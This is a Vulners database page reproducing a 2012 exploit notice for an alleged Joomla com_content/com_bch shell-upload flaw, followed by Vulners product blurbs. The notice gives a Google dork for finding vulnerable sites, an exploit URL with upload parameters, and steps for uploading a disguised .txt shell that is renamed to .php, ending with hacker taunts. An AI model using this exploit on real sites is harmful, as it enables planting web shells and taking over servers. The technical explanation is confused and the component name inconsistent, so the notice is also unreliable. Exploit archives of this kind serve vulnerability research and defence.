Vulners
Lucene search
Joomla Bch / Content Shell Upload
` [ Joomla com_content Shell Upload Vulnerability]
[x] Author : Agd_Scorp
[x] Home : www.turkguvenligi.info (former)
[x] E-mail : [email protected]
[x] Found : Mon, Dec 24, 2012
[x] Tested : Windows 7, Ubuntu, Gentoo
[x] Dork : inurl:"/index.php?option=com_bch"
________________________________________________________________
****************************************************************
[x] The Conlusion
The vulnerability resides at 'cont' parameter, which is often used for reconnecting the SQL database to the website in-order to gain information that is being provided by the administrator, although, if a few parameters are added as an extention-act, files can be uploaded, and therefore, more risk shall occur.
[x] Vuln Exploit Report:
http://localhost/index.php?option=com_content&cont=sendfile?controller&attach_file=[FILE LINK]&chformat=php (or any other you want it to change into)
[x] Uploading a Shell
First, change your shell's format into .txt, then extract into that, when uploaded, and chformat parameter is added, it will be automatically be changed into *.php, therefore, your shell is spawned.
[x] Note:
h4ck y0u...
kill y0u...
0wn y0u....
- TURKGUVENLIGI -
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Dec 2012 00:00Current